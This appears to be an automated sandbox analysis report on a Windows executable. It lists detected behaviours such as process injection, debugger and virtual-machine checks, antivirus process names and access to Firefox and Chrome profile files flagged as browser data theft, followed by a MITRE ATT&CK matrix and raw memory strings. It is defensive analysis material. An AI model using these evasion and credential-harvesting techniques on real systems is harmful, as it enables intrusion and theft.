        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: CA80000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: CAC0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: CAE0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0048BD40 sgdt fword ptr [ebp-20h]0_2_0048BD40
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0048BB50 sldt word ptr [ebp-1Ch]0_2_0048BB50
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: GetProcAddress,GetAdaptersInfo,0_2_00467280
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: GetSystemDirectoryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetAdaptersInfo,FreeLibrary,0_2_0048FD60
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00468E20 GetProcAddress,GetProcAddress,GetProcAddress,SetupDiGetClassDevsW,GetProcAddress,GetProcAddress,SetupDiGetDeviceRegistryPropertyA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetupDiDestroyDeviceInfoList,0_2_00468E20
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: PhysicalDrive0Jump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00410800 GetProcAddress,GetProcAddress,GetProcAddress,SHGetPathFromIDListW,FindFirstFileW,CoInitialize,CoCreateInstance,_wcsrchr,_wcschr,CoUninitialize,FindNextFileW,FindClose,0_2_00410800
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0048E0D0 CreateFileW,FindFirstFileW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,CopyFileW,DeleteFileW,CreateFileW,GetFileSize,ReadFile,CloseHandle,0_2_0048E0D0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00457360 GetProcAddress,FindFirstFileW,CoInitialize,CoCreateInstance,GetProcAddress,GetProcAddress,GetProcAddress,CoUninitialize,FindNextFileW,FindClose,0_2_00457360
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00484290 GetModuleHandleW,GetProcAddress,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_wcsstr,_wcsstr,_wcsstr,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00484290
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.iniJump to behavior
        Source: nv8401986_110422.exe, 00000000.00000003.2035873967.0000000004088000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004088000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn*
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: data:image/png;base64,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
        Source: nv8401986_110422.exe, 00000000.00000002.3274337460.000000000080B000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2035873967.0000000004088000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004088000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: nv8401986_110422.exe, 00000000.00000003.2017243202.000000000087A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\h
        Source: nv8401986_110422.exe, 00000000.00000002.3302728536.000000000E2C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: heraxResKeytainertxmlns='http://www.w3.org/2000/svg' viewBox='0 0 2048 2048'%3E%3Cpath stroke='%23767676' stroke-width='2.5' stroke-linecap='round' stroke-miterlimit='10' fill='%23767676' d='M2048 341v683h-171V633l-768 768-341-342-665 665-121-120 786-786 341 341 648-647h-392V341h683z'%3E%3C/path%3E%3C/svg%3E='9' cy='9' r='7.75' fill='none'%3E%3C/circle%3E%3Cpath fill='none' d='M25 25h-25v-25h25z'%3E%3C/path%3E%3C/svg%3E0134452 4.7319 0.0118565 4.60901 0.0621374C4.48611 0.112418 4.37446 0.186671 4.28056 0.280564C4.18667 0.374457 4.11242 0.486109 4.06214 0.609005C4.01186 0.731901 3.98655 0.863581 3.98771 0.99636C3.98886 1.12914 4.01645 1.26036 4.06886 1.38236C4.12127 1.50437 4.19745 1.61471 4.29296 1.70696L10.586 7.99996L4.29296 14.293C4.19745 14.3852 4.12127 14.4956 4.06886 14.6176C4.01645 14.7396 3.98886 14.8708 3.98771 15.0036C3.98655 15.1363 4.01186 15.268 4.06214 15.3909C4.11242 15.5138 4.18667 15.6255 4.28056 15.7194C4.37446 15.8132 4.48611 15.8875 4.60901 15.9378C4.7319 15.9881 4.86358 16.0134 4.99636 16.0122C5.12914 16.0111 5.26036 15.9835 5.38236 15.9311C5.50437 15.8787 5.61471 15.8025 5.70696 15.707Z' fill='white'/%3E%3C/g%3E%3Cdefs%3E%3CclipPath id='clip0_1248_247'%3E%3Crect width='16' height='16' fill='white'/%3E%3C/clipPath%3E%3C/defs%3E%3C/svg%3EL2Lbttm3bxti2bdv6au+qU8manJPHfun/c377q3XWjXH8OtHtt934KXpX9Be3Krnaec6gmzu2p/0gW2XWtMDpdGZne87s0DZRz3J5VImwHm9+/lh7OyIv73vZa2ZestVzcnrbWv+g+9pUIMKwx5M/JyfH5/Ozw6cUFOwu2N2m+PgFzmwvrM+3ePGpdsPx7VRu2vVretsNv/D/Dhdne2AFXfPkwhDrYfxpmx4U+TxesqALiy+0HiZAfSB6ncLHkra4uOQCSxxkig9FL1L7+dHClpQkJ/tb2Fu0+In6UbSeh2FBk8uDLPSlWqCnqfnzq708LGw5ChrR7ke7AYAF9Qv1t2fQWD/qrs5/yi6aOLHzkLb2KgbcM6r96r9hyD0fi75R3RHcGl+jxWey2NhY9ZsKrq+vP3Toa/SbbHDr51+mBHeM85O4+1H0FWpoaHiJm6StPwvuI9UAaUPuf2z69MSoqBXLlv2uOkPj4Vq8YvbqcIkj4kgnRq3QfLDGA7RQ5ebm9pO453dKE+c0HqgF9bBooCEbeURo5vBUlGn7saDe4DIzM6+Vtv/s2VrDU4kmHqYAelv0rWiYxN22siYOT11i4qu1eId6XBQg8a1fbl0LTRye01/7PBbUe6JP0HXShqw7SJo4PNfTxNcT4N5U9ZI4Ipo18zjsiyJMrMWv3M8oUOLQp6LXKQ6P4lB/EzPgXpaNMmSRSQnRYhwcHvuikYaZKT7nHkF9pXVsn5eUQONYZ4+6azxKEvQWt3TpnRKf3gKNcebw4sLabhr3ZSB7gAqQuE9GkeAJWCePCyhY414A1KPUE2ioevWOmIyiopZ5xMmjg1cYuoAwALRRNGXjFDRO4h7P7YiJEePgwuMACmXHjQsDQH/IJoxX9p8l08AzwJUXF8KZqcYPDRs9ekLjrl2NjQcO3Hu3gzq/a+m0mdC8LjwdSIo02ivw3G2pm+burHxoddmG51O2NLtcWVNnLlGcPA5sDzXar1Ma482M69xZmrNH4YZFY+buq5zBeE+zq2bR++6sqcSFxz4u9DGsCti3s3LG6rLNhQKXLv9iUYXm8OLCyYZlF4vhsg2FKVv2uOomLydOj4fHBeSwxl1gaXgLXj1rcisOLy5g2LJAWPpcePW/J82SnDz2cQHD1t0Ey8N1aWmbFMd8RYXb7c7CsE1nwfJwTWoqNHH2eMCVDlscXsjWVbtt5Uri8ODwONDFsO/sFLKle6uqmPM8HehkdJDjcrK1VelV6emKs2drX4+urtq9qemU4pgfE2gct070H3UVaZJu2kWyAAAAAElFTkSuQmCC1,e="",o,s,f,r,u,st=!1,w=[],l=SbiUtil.pd,a=SbiUtil.oncop;n.showLoadingIcon=ct;n.init=wi})(SBICom||(SBICom={}));var Lib;(function(n){var t;(function(n){function u(n,t){var r,i;if(t==null||n==null)throw new TypeError("Null element passed to Lib.CssClass");if(n.indexOf)return n.indexOf(t);for(r=n.length,i=0;i<r;i++)if(n[i]===t)return i;return-1}function f(n,u){if(n==null)throw new TypeError("Null element passed to Li
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: url("data:image/png;base64,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")l
        Source: nv8401986_110422.exe, 00000000.00000002.3302728536.000000000E253000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q9qemU4p
        Source: C:\Users\user\Desktop\nv8401986_110422.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00466CF0 GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcess,GetCurrentProcess,GetProcAddress,CheckRemoteDebuggerPresent,GetProcAddress,RtlInitializeCriticalSection,__Init_thread_footer,RtlEnterCriticalSection,RtlLeaveCriticalSection,KiUserExceptionDispatcher,GetSystemTime,GetProcAddress,GetTimeZoneInformation,RasEnumConnectionsW,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,GetModuleHandleW,GetProcAddress,GetVersionExA,0_2_00466CF0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0051B34E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0051B34E
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0046D180 LoadLibraryA,GetProcAddress,0_2_0046D180
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0052E24E mov eax, dword ptr fs:[00000030h]0_2_0052E24E
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00466CF0 GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcess,GetCurrentProcess,GetProcAddress,CheckRemoteDebuggerPresent,GetProcAddress,RtlInitializeCriticalSection,__Init_thread_footer,RtlEnterCriticalSection,RtlLeaveCriticalSection,KiUserExceptionDispatcher,GetSystemTime,GetProcAddress,GetTimeZoneInformation,RasEnumConnectionsW,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,GetModuleHandleW,GetProcAddress,GetVersionExA,0_2_00466CF0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0051B34E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0051B34E
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00513E11 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00513E11
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Contains functionality to inject threads in other processes
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00469FF0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,0_2_00469FF0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0048CD60 cpuid 0_2_0048CD60
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0053C938
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: EnumSystemLocalesW,0_2_0053CBFB
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: EnumSystemLocalesW,0_2_0053CBB0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: EnumSystemLocalesW,0_2_00532C21
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: EnumSystemLocalesW,0_2_0053CC96
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: GetLocaleInfoW,0_2_005330EB
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0053D09C
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0053D270
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00468E20 GetProcAddress,GetProcAddress,GetProcAddress,SetupDiGetClassDevsW,GetProcAddress,GetProcAddress,SetupDiGetDeviceRegistryPropertyA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetupDiDestroyDeviceInfoList,0_2_00468E20
        Source: C:\Users\user\Desktop\nv8401986_110422.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_004886E0 GetProcAddress,GetProcAddress,GetLocalTime,GetProcAddress,PathFileExistsA,SetFileAttributesA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,CreateFileA,CloseHandle,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,0_2_004886E0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00466CF0 GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcess,GetCurrentProcess,GetProcAddress,CheckRemoteDebuggerPresent,GetProcAddress,RtlInitializeCriticalSection,__Init_thread_footer,RtlEnterCriticalSection,RtlLeaveCriticalSection,KiUserExceptionDispatcher,GetSystemTime,GetProcAddress,GetTimeZoneInformation,RasEnumConnectionsW,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,GetModuleHandleW,GetProcAddress,GetVersionExA,0_2_00466CF0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00466CF0 GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcess,GetCurrentProcess,GetProcAddress,CheckRemoteDebuggerPresent,GetProcAddress,RtlInitializeCriticalSection,__Init_thread_footer,RtlEnterCriticalSection,RtlLeaveCriticalSection,KiUserExceptionDispatcher,GetSystemTime,GetProcAddress,GetTimeZoneInformation,RasEnumConnectionsW,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,GetModuleHandleW,GetProcAddress,GetVersionExA,0_2_00466CF0
        Source: nv8401986_110422.exeBinary or memory string: msmpeng.exe
        Source: nv8401986_110422.exeBinary or memory string: 360tray.exe

        Stealing of Sensitive Information

        barindex
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\default\Secure PreferencesJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        Disable or Modify Tools        		1
        OS Credential Dumping        		2
        System Time Discovery        		Remote Services1
        Archive Collected Data        		2
        Ingress Tool Transfer        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Command and Scripting Interpreter        		1
        Bootkit        		1
        Process Injection        		1
        Deobfuscate/Decode Files or Information        		1
        Input Capture        		4
        File and Directory Discovery        		Remote Desktop Protocol1
        Data from Local System        		11
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)21
        Obfuscated Files or Information        		Security Account Manager64
        System Information Discovery        		SMB/Windows Admin Shares1
        Input Capture        		3
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
        Software Packing        		NTDS2
        Query Registry        		Distributed Component Object Model2
        Clipboard Data        		14
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading        		LSA Secrets151
        Security Software Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Masquerading        		Cached Domain Credentials15
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items15
        Virtualization/Sandbox Evasion        		DCSync2
        Process Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Process Injection        		Proc Filesystem1
        Application Window Discovery        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Bootkit        		/etc/passwd and /etc/shadow1
        System Network Configuration Discovery        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

